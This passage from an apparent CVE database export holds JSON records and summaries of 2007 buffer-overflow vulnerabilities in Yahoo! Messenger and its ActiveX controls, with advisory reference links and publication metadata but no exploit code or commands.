"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2007-08-29T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Buffer overflow in a certain ActiveX control in YVerInfo.dll before 2007.8.27.1 in the Yahoo! services suite for Yahoo! Messenger before 8.1.0.419 allows remote attackers to execute arbitrary code via unspecified vectors involving arguments to the (1) fvCom and (2) info methods. NOTE: some of these details are obtained from third party information."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-07-28T12:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "37739",
"tags": [
"vdb-entry",
"x_refsource_OSVDB"
],
"url": "http://osvdb.org/37739"
},
{
"name": "26579",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/26579"
},
{
"name": "yahoo-messenger-yverinfo-bo(36363)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/36363"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://messenger.yahoo.com/security_update.php?id=082907"
},
{
"name": "20070830 Yahoo Messenger YVerInfo.dll ActiveX Multiple Remote Buffer Overflow Vulnerabilities",
"tags": [
"third-party-advisory",
"x_refsource_IDEFENSE"
],
"url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=591"
},
{
"name": "3083",
"tags": [
"third-party-advisory",
"x_refsource_SREASON"
],
"url": "http://securityreason.com/securityalert/3083"
},
{
"name": "1018628",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://securitytracker.com/id?1018628"
},
{
"name": "25494",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/25494"
},
{
"name": "ADV-2007-3011",
"tags": [
"vdb-entry",
"x_refsource_VUPEN"
],
"url": "http://www.vupen.com/english/advisories/2007/3011"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2007-4515",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Buffer overflow in a certain ActiveX control in YVerInfo.dll before 2007.8.27.1 in the Yahoo! services suite for Yahoo! Messenger before 8.1.0.419 allows remote attackers to execute arbitrary code via unspecified vectors involving arguments to the (1) fvCom and (2) info methods. NOTE: some of these details are obtained from third party information."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "37739",
"refsource": "OSVDB",
"url": "http://osvdb.org/37739"
},
{
"name": "26579",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/26579"
},
{
"name": "yahoo-messenger-yverinfo-bo(36363)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/36363"
},
{
"name": "http://messenger.yahoo.com/security_update.php?id=082907",
"refsource": "CONFIRM",
"url": "http://messenger.yahoo.com/security_update.php?id=082907"
},
{
"name": "20070830 Yahoo Messenger YVerInfo.dll ActiveX Multiple Remote Buffer Overflow Vulnerabilities",
"refsource": "IDEFENSE",
"url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=591"
},
{
"name": "3083",
"refsource": "SREASON",
"url": "http://securityreason.com/securityalert/3083"
},
{
"name": "1018628",
"refsource": "SECTRACK",
"url": "http://securitytracker.com/id?1018628"
},
{
"name": "25494",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/25494"
},
{
"name": "ADV-2007-3011",
"refsource": "VUPEN",
"url": "http://www.vupen.com/english/advisories/2007/3011"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2007-4515",
"datePublished": "2007-08-31T22:00:00",
"dateReserved": "2007-08-23T00:00:00",
"dateUpdated": "2024-08-07T15:01:09.859Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2007-4391 (GCVE-0-2007-4391)
Vulnerability from nvd – Published: 2007-08-17 22:00 – Updated: 2024-08-07 14:53
VLAI?
Summary
Heap-based buffer overflow in Kakadu kdu_v32m.dll in Yahoo! Messenger 8.1.0.413 allows remote attackers to cause a denial of service (application crash) via a certain length field in JPEG2000 data, as demonstrated by sending an "invite to view my webcam" request, and then injecting a DLL into the attacker's peer Yahoo! Messenger application when this request is accepted.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | |||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T14:53:55.679Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "ADV-2007-2917",
"tags": [
"vdb-entry",
"x_refsource_VUPEN",
"x_transferred"
],
"url": "http://www.vupen.com/english/advisories/2007/2917"
},
{
"name": "yahoo-messenger-webcam-bo(36115)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/36115"
},
{
"name": "VU#515968",
"tags": [
"third-party-advisory",
"x_refsource_CERT-VN",
"x_transferred"
],
"url": "http://www.kb.cert.org/vuls/id/515968"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.avertlabs.com/research/blog/index.php/2007/08/15/more-on-the-yahoo-messenger-webcam-0day/"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.team509.com/expyahoo.rar"
},
{
"name": "26501",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/26501"
},
{
"name": "25330",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/25330"
},
{
"name": "38221",
"tags": [
"vdb-entry",
"x_refsource_OSVDB",
"x_transferred"
],
"url": "http://osvdb.org/38221"
},
{
"name": "1018586",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://www.securitytracker.com/id?1018586"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.xfocus.net/bbs/index.php?act=ST\u0026f=2\u0026t=64639\u0026page=1#entry321749"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2007-08-12T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Heap-based buffer overflow in Kakadu kdu_v32m.dll in Yahoo! Messenger 8.1.0.413 allows remote attackers to cause a denial of service (application crash) via a certain length field in JPEG2000 data, as demonstrated by sending an \"invite to view my webcam\" request, and then injecting a DLL into the attacker\u0027s peer Yahoo! Messenger application when this request is accepted."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-07-28T12:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "ADV-2007-2917",
"tags": [
"vdb-entry",
"x_refsource_VUPEN"
],
"url": "http://www.vupen.com/english/advisories/2007/2917"
},
{
"name": "yahoo-messenger-webcam-bo(36115)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/36115"
},
{
"name": "VU#515968",
"tags": [
"third-party-advisory",
"x_refsource_CERT-VN"
],
"url": "http://www.kb.cert.org/vuls/id/515968"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.avertlabs.com/research/blog/index.php/2007/08/15/more-on-the-yahoo-messenger-webcam-0day/"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.team509.com/expyahoo.rar"
},
{
"name": "26501",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/26501"
},
{
"name": "25330",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/25330"
},
{
"name": "38221",
"tags": [
"vdb-entry",
"x_refsource_OSVDB"
],
"url": "http://osvdb.org/38221"
},
{
"name": "1018586",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://www.securitytracker.com/id?1018586"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.xfocus.net/bbs/index.php?act=ST\u0026f=2\u0026t=64639\u0026page=1#entry321749"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2007-4391",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Heap-based buffer overflow in Kakadu kdu_v32m.dll in Yahoo! Messenger 8.1.0.413 allows remote attackers to cause a denial of service (application crash) via a certain length field in JPEG2000 data, as demonstrated by sending an \"invite to view my webcam\" request, and then injecting a DLL into the attacker\u0027s peer Yahoo! Messenger application when this request is accepted."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "ADV-2007-2917",
"refsource": "VUPEN",
"url": "http://www.vupen.com/english/advisories/2007/2917"
},
{
"name": "yahoo-messenger-webcam-bo(36115)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/36115"
},
{
"name": "VU#515968",
"refsource": "CERT-VN",
"url": "http://www.kb.cert.org/vuls/id/515968"
},
{
"name": "http://www.avertlabs.com/research/blog/index.php/2007/08/15/more-on-the-yahoo-messenger-webcam-0day/",
"refsource": "MISC",
"url": "http://www.avertlabs.com/research/blog/index.php/2007/08/15/more-on-the-yahoo-messenger-webcam-0day/"
},
{
"name": "http://www.team509.com/expyahoo.rar",
"refsource": "MISC",
"url": "http://www.team509.com/expyahoo.rar"
},
{
"name": "26501",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/26501"
},
{
"name": "25330",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/25330"
},
{
"name": "38221",
"refsource": "OSVDB",
"url": "http://osvdb.org/38221"
},
{
"name": "1018586",
"refsource": "SECTRACK",
"url": "http://www.securitytracker.com/id?1018586"
},
{
"name": "https://www.xfocus.net/bbs/index.php?act=ST\u0026f=2\u0026t=64639\u0026page=1#entry321749",
"refsource": "MISC",
"url": "https://www.xfocus.net/bbs/index.php?act=ST\u0026f=2\u0026t=64639\u0026page=1#entry321749"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2007-4391",
"datePublished": "2007-08-17T22:00:00",
"dateReserved": "2007-08-17T00:00:00",
"dateUpdated": "2024-08-07T14:53:55.679Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2007-3928 (GCVE-0-2007-3928)
Vulnerability from nvd – Published: 2007-07-21 00:00 – Updated: 2024-08-07 14:37
VLAI?
Summary
Buffer overflow in Yahoo! Messenger 8.1 allows user-assisted remote authenticated users to execute arbitrary code via a long e-mail address in an address book entry. NOTE: this might overlap CVE-2007-3638.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T14:37:04.515Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "26066",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/26066"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.xdisclose.com/advisory/XD100002.html"
},
{
"name": "24926",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/24926"
},
{
"name": "1018398",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://www.securitytracker.com/id?1018398"
},
{
"name": "2906",
"tags": [
"third-party-advisory",
"x_refsource_SREASON",
"x_transferred"
],
"url": "http://securityreason.com/securityalert/2906"
},
{
"name": "yahoo-messenger-address-book-bo(35434)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/35434"
},
{
"name": "20070716 Yahoo Messenger 8.1 Buffer Overflow",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2007-July/064669.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2007-07-16T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Buffer overflow in Yahoo! Messenger 8.1 allows user-assisted remote authenticated users to execute arbitrary code via a long e-mail address in an address book entry. NOTE: this might overlap CVE-2007-3638."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-07-28T12:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "26066",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/26066"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.xdisclose.com/advisory/XD100002.html"
},
{
"name": "24926",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/24926"
},
{
"name": "1018398",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://www.securitytracker.com/id?1018398"
},
{
"name": "2906",
"tags": [
"third-party-advisory",
"x_refsource_SREASON"
],
"url": "http://securityreason.com/securityalert/2906"
},
{
"name": "yahoo-messenger-address-book-bo(35434)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/35434"
},
{
"name": "20070716 Yahoo Messenger 8.1 Buffer Overflow",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2007-July/064669.html"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2007-3928",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Buffer overflow in Yahoo! Messenger 8.1 allows user-assisted remote authenticated users to execute arbitrary code via a long e-mail address in an address book entry. NOTE: this might overlap CVE-2007-3638."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "26066",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/26066"
},
{
"name": "http://www.xdisclose.com/advisory/XD100002.html",
"refsource": "MISC",
"url": "http://www.xdisclose.com/advisory/XD100002.html"
},
{
"name": "24926",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/24926"
},
{
"name": "1018398",
"refsource": "SECTRACK",
"url": "http://www.securitytracker.com/id?1018398"
},
{
"name": "2906",
"refsource": "SREASON",
"url": "http://securityreason.com/securityalert/2906"
},
{
"name": "yahoo-messenger-address-book-bo(35434)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/35434"
},
{
"name": "20070716 Yahoo Messenger 8.1 Buffer Overflow",
"refsource": "FULLDISC",
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2007-July/064669.html"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2007-3928",
"datePublished": "2007-07-21T00:00:00",
"dateReserved": "2007-07-20T00:00:00",
"dateUpdated": "2024-08-07T14:37:04.515Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2007-3638 (GCVE-0-2007-3638)
Vulnerability from nvd – Published: 2007-07-10 00:00 – Updated: 2024-08-07 14:21
VLAI?
Summary
Buffer overflow in Yahoo! Messenger 8.1 allows user-assisted remote authenticated users, who are listed in an address book, to execute arbitrary code via unspecified vectors, aka ZD-00000005. NOTE: this information is based upon a vague advisory by a vulnerability information sales organization that does not coordinate with vendors or release actionable advisories. A CVE has been assigned for tracking purposes, but duplicates with other CVEs are difficult to determine.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T14:21:36.599Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "24784",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/24784"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.wslabi.com/wabisabilabi/initPublishedBid.do?"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2007-07-02T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Buffer overflow in Yahoo! Messenger 8.1 allows user-assisted remote authenticated users, who are listed in an address book, to execute arbitrary code via unspecified vectors, aka ZD-00000005. NOTE: this information is based upon a vague advisory by a vulnerability information sales organization that does not coordinate with vendors or release actionable advisories. A CVE has been assigned for tracking purposes, but duplicates with other CVEs are difficult to determine."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2007-07-27T09:00:00",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "24784",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/24784"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.wslabi.com/wabisabilabi/initPublishedBid.do?"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2007-3638",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Buffer overflow in Yahoo! Messenger 8.1 allows user-assisted remote authenticated users, who are listed in an address book, to execute arbitrary code via unspecified vectors, aka ZD-00000005. NOTE: this information is based upon a vague advisory by a vulnerability information sales organization that does not coordinate with vendors or release actionable advisories. A CVE has been assigned for tracking purposes, but duplicates with other CVEs are difficult to determine."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "24784",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/24784"
},
{
"name": "http://www.wslabi.com/wabisabilabi/initPublishedBid.do?",
"refsource": "MISC",
"url": "http://www.wslabi.com/wabisabilabi/initPublishedBid.do?"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2007-3638",
"datePublished": "2007-07-10T00:00:00",
"dateReserved": "2007-07-09T00:00:00",
"dateUpdated": "2024-08-07T14:21:36.599Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2007-3147 (GCVE-0-2007-3147)
Vulnerability from nvd – Published: 2007-06-11 18:00 – Updated: 2024-08-07 14:05
VLAI?
Summary
Buffer overflow in the Yahoo! Webcam Upload ActiveX control in ywcupl.dll 2.0.1.4 for Yahoo! Messenger 8.1.0.249 allows remote attackers to execute arbitrary code via a long server property value to the send method. NOTE: some of these details are obtained from third party information.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T14:05:28.302Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "20070606 Yahoo 0day ActiveX Webcam Exploit",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2007-June/063817.html"
},
{
"name": "4042",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB",
"x_transferred"
],
"url": "https://www.exploit-db.com/exploits/4042"
},
{
"name": "24354",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/24354"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://research.eeye.com/html/advisories/upcoming/20070605.html"
},
{
"name": "VU#949817",
"tags": [
"third-party-advisory",
"x_refsource_CERT-VN",
"x_transferred"
],
"url": "http://www.kb.cert.org/vuls/id/949817"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://messenger.yahoo.com/security_update.php?id=060707"
},
{
"name": "ADV-2007-2094",
"tags": [
"vdb-entry",
"x_refsource_VUPEN",
"x_transferred"
],
"url": "http://www.vupen.com/english/advisories/2007/2094"
},
{
"name": "25547",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/25547"
},
{
"name": "20070608 EEYE: Yahoo Webcam ActiveX Controls Multiple Buffer Overflows",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/470861/100/0/threaded"
},
{
"name": "1018204",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://securitytracker.com/id?1018204"
},
{
"name": "yahoo-webcam-upload-bo(34758)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34758"
},
{
"name": "24341",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/24341"
},
{
"name": "1018203",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://www.securitytracker.com/id?1018203"
},
{
"name": "2809",
"tags": [
"third-party-advisory",
"x_refsource_SREASON",
"x_transferred"
],
"url": "http://securityreason.com/securityalert/2809"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://research.eeye.com/html/advisories/published/AD20070608.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2007-06-06T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Buffer overflow in the Yahoo! Webcam Upload ActiveX control in ywcupl.dll 2.0.1.4 for Yahoo! Messenger 8.1.0.249 allows remote attackers to execute arbitrary code via a long server property value to the send method. NOTE: some of these details are obtained from third party information."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-16T14:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "20070606 Yahoo 0day ActiveX Webcam Exploit",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2007-June/063817.html"
},
{
"name": "4042",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB"
],
"url": "https://www.exploit-db.com/exploits/4042"
},
{
"name": "24354",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/24354"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://research.eeye.com/html/advisories/upcoming/20070605.html"
},
{
"name": "VU#949817",
"tags": [
"third-party-advisory",
"x_refsource_CERT-VN"
],
"url": "http://www.kb.cert.org/vuls/id/949817"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://messenger.yahoo.com/security_update.php?id=060707"
},
{
"name": "ADV-2007-2094",
"tags": [
"vdb-entry",
"x_refsource_VUPEN"
],
"url": "http://www.vupen.com/english/advisories/2007/2094"
},
{
"name": "25547",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/25547"
},
{
"name": "20070608 EEYE: Yahoo Webcam ActiveX Controls Multiple Buffer Overflows",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/470861/100/0/threaded"
},
{
"name": "1018204",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://securitytracker.com/id?1018204"
},
{
"name": "yahoo-webcam-upload-bo(34758)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34758"
},
{
"name": "24341",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/24341"
},
{
"name": "1018203",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://www.securitytracker.com/id?1018203"
},
{
"name": "2809",
"tags": [
"third-party-advisory",
"x_refsource_SREASON"
],
"url": "http://securityreason.com/securityalert/2809"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://research.eeye.com/html/advisories/published/AD20070608.html"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2007-3147",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Buffer overflow in the Yahoo! Webcam Upload ActiveX control in ywcupl.dll 2.0.1.4 for Yahoo! Messenger 8.1.0.249 allows remote attackers to execute arbitrary code via a long server property value to the send method. NOTE: some of these details are obtained from third party information."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "20070606 Yahoo 0day ActiveX Webcam Exploit",
"refsource": "FULLDISC",
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2007-June/063817.html"
},
{
"name": "4042",
"refsource": "EXPLOIT-DB",
"url": "https://www.exploit-db.com/exploits/4042"
},
{
"name": "24354",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/24354"
},
{
"name": "http://research.eeye.com/html/advisories/upcoming/20070605.html",
"refsource": "MISC",
"url": "http://research.eeye.com/html/advisories/upcoming/20070605.html"
},
{
"name": "VU#949817",
"refsource": "CERT-VN",
"url": "http://www.kb.cert.org/vuls/id/949817"
},
{
"name": "http://messenger.yahoo.com/security_update.php?id=060707",
"refsource": "CONFIRM",
"url": "http://messenger.yahoo.com/security_update.php?id=060707"
},
{
"name": "ADV-2007-2094",
"refsource": "VUPEN",
"url": "http://www.vupen.com/english/advisories/2007/2094"
},
{
"name": "25547",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/25547"
},
{
"name": "20070608 EEYE: Yahoo Webcam ActiveX Controls Multiple Buffer Overflows",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/470861/100/0/threaded"
},
{
"name": "1018204",
"refsource": "SECTRACK",
"url": "http://securitytracker.com/id?1018204"
},
{
"name": "yahoo-webcam-upload-bo(34758)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34758"
},
{
"name": "24341",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/24341"
},
{
"name": "1018203",
"refsource": "SECTRACK",
